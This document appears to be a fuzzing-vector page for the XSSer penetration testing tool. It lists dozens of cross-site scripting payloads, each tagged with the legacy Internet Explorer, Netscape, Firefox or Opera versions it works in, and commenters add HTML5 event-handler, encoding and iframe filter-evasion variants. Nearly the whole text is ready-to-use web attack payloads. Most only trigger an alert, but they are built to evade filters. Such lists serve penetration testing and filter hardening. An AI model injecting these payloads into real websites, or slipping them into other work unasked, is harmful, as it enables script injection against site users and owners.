N-1


XSSer valid payload vectors

XSSer fuzzing vectors (included in /fuzzing/vectors.py):

Note: add your own.

---------------

IE7.0   Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2.  
IE6.0   Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000.  
NS8.1-IE   Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed its security model away from the trusted/untrusted model and has opted for Gecko as the default and IE as an option.  
NS8.1-G   Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional.  
FF2.0   Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional.  
O9.02   Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional.  
NS4   Vector works in older versions of Netscape 4.0 - untested.  

---------------

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


><img src=x onerror=alert(XSS);>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

;!--"<XSS>=&{()}"
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG SRC="javascript:alert('XSS');">

[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC=javascript:alert('XSS')>
[IE6.0|NS8.1-IE] [O9.02]

       
<IMG SRC=JaVaScRiPt:alert('XSS')>
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC=javascript:alert(&quot;XSS&quot;)>
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC=`javascript:alert("'XSS'")`>
[IE6.0|NS8.1-IE]

       
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG SRC="jav   ascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC="jav&#x09;ascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]
       

<IMG SRC="jav&#x0A;ascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC="jav&#x0D;ascript:alert('XSS');">

[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
[IE7.0|IE6.0|NS8.1-IE]
       

<IMG SRC=" &#14;  javascript:alert('XSS');">
[IE6.0|NS8.1-IE]
       

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[NS8.1-G|FF2.0]
       

<<SCRIPT>alert("XSS");//<</SCRIPT>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


\";alert('XSS');//
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG SRC='javascript:alert('XSS')

[IE6.0|NS8.1-IE] [O9.02]


 <SCRIPT>alert(/XSS/.source)</SCRIPT>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<BODY BACKGROUND="javascript:alert('XSS')">

[IE6.0|NS8.1-IE] [O9.02]


</TITLE><SCRIPT>alert("XSS");</SCRIPT>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<BODY ONLOAD=alert('XSS')>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<IMG DYNSRC="javascript:alert('XSS')">
[IE6.0|NS8.1-IE]


<IMG LOWSRC="javascript:alert('XSS')">

[IE6.0|NS8.1-IE]


<BGSOUND SRC="javascript:alert('XSS');">
[O9.02]


<BR SIZE="&{alert('XSS')}">
[NS4]


<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [O9.02]


<IMG SRC='vbscript:msgbox("XSS")'>
[IE6.0|NS8.1-IE]
    

<IMG SRC="mocha:[XSS]">
[NS4]


<IMG SRC="livescript:[XSS]">
[NS4]


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<TABLE BACKGROUND="javascript:alert('XSS')">

[IE6.0|NS8.1-IE] [O9.02]


<TABLE><TD BACKGROUND="javascript:alert('XSS')">
[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<DIV STYLE="background-image: url(javascript:alert('XSS'))">
[IE6.0|NS8.1-IE]

       
<DIV STYLE="width: expression(alert('XSS'));">
[IE7.0|IE6.0|NS8.1-IE]


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


<TABLE BACKGROUND="javascript:alert('XSS')">
[IE6.0|NS8.1-IE] [O9.02]

   
<TABLE><TD BACKGROUND="javascript:alert('XSS')">"
[IE6.0|NS8.1-IE] [O9.02]
       
       
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
[IE6.0|NS8.1-IE]


<DIV STYLE="width: expression(alert('XSS'));">
[IE7.0|IE6.0|NS8.1-IE]
       

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
[IE6.0|NS8.1-IE]


<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
[IE7.0|IE6.0|NS8.1-IE]

      
<XSS STYLE="xss:expression(alert('XSS'))">
[IE7.0|IE6.0|NS8.1-IE]

 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
[NS4]


<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
[IE6.0|NS8.1-IE]

   
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
[IE6.0|NS8.1-IE]

       
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
[IE7.0|IE6.0|NS8.1-IE]


<BASE HREF="javascript:alert('XSS');//">
[IE6.0|NS8.1-IE]


<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
[O9.02]

   
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

       
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X><xml><SPAN DATASRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
[IE6.0|NS8.1-IE]

       
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
[IE6.0|NS8.1-IE]


<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
[IE6.0|NS8.1-IE]


<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
[IE7.0|IE6.0|NS8.1-IE]

   
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

       
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Comments

    • psy

      <SCRIPT SRC=http://127.0.0.1></SCRIPT>
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
      [IE6.0|NS8.1-IE] [O9.02]

      <IMG SRC="&14;javascript:alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]
         
      <SCRIPT <B>=alert('XSS');"></SCRIPT>
      [IE6.0|NS8.1-IE] [O9.02]    

      <IFRAME SRC="javascript:alert('XSS'); <
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <LAYER SRC="javascript:alert('XSS');></LAYER>
      [NS4]
         
      <STYLE>li {list-style-image: url("javascript:alert('XSS');</STYLE><UL><LI>XSS
      [IE6.0|NS8.1-IE]

      <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'));">
      [IE6.0|NS8.1-IE]
             
      <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <a href="javascript#alert('XSS');">
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <div onmouseover="alert('XSS');">,
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <input type="image" dynsrc="javascript:alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]

      &<script>alert('XSS');</script>">
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      &{alert('XSS');};
      [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <IMG SRC=&{alert('XSS');};>
      [IE6.0|NS8.1-IE] [O9.02]

      <a href="about:<script>alert('XSS');</script>">
      [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

      <DIV STYLE="binding: url(javascript:alert('XSS'));">
      [IE6.0|NS8.1-IE]

      <OBJECT classid=clsid:..." codebase="javascript:alert('XSS');">
      [O9.02]

      <style><!--</style><script>alert('XSS');//--></script>
      [IE6.0|NS8.1-IE]

      ![CDATA[<!--]]<script>alert('XSS');//--></script>
      [IE6.0|NS8.1-IE]

      <!-- -- --><script>alert('XSS');</script><!-- -- -->
      [Not Verified]

      <img src="blah"onmouseover="alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]

      <img src="blah>"onmouseover="alert('XSS');">
      [IE6.0|NS8.1-IE] [O9.02]
             
      <xml id="X"><a><b><script>alert('XSS');</script>;<b></a></xml>
      [IE6.0|NS8.1-IE]

      <div datafld="b" dataformatas="html" datasrc="#XSS"></div>
      [Not Verified]

      [\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
      [Not Verified]

      <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:alert('XSS');">]]</C><X></xml>
      [IE6.0|NS8.1-IE]

      • psy

        html 5 formaction

        <form id="test" /><button form="test" formaction="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">X

        html 5 autofocus

        <input onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        <select onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        <textarea onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        <keygen
        onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>

        html 5 autofocus race

        <input onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>

        html 5 poster

        <video poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//

        html 5 onscroll event + autofocus

        <body onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

        html 5 onforminput

        Please input something to trigger the test<form id=test onforminput=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><input></form>

        html 5 onformchange

        Please input something to trigger the test<form id=test><input></form><button form=test onformchange==javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))>X

        html 5 video source

        <video><source onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">

        html 5 video onerror with source tag

        <video onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source>

        • psy

          more iframe valid vectors:

          <iframe/ /onload=alert(/XSS/)></iframe>
          <iframe/ "onload=alert(/XSS/)></iframe>
          <iframe///////onload=alert(/XSS/)></iframe>
          <iframe "onload=alert(/XSS/)></iframe>
          <iframe<?php echo chr(11)?> onload=alert(/XSS/)></iframe>
          <iframe<?php echo chr(12)?> onload=alert(/XSS/)></iframe>

        XSSer


        XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.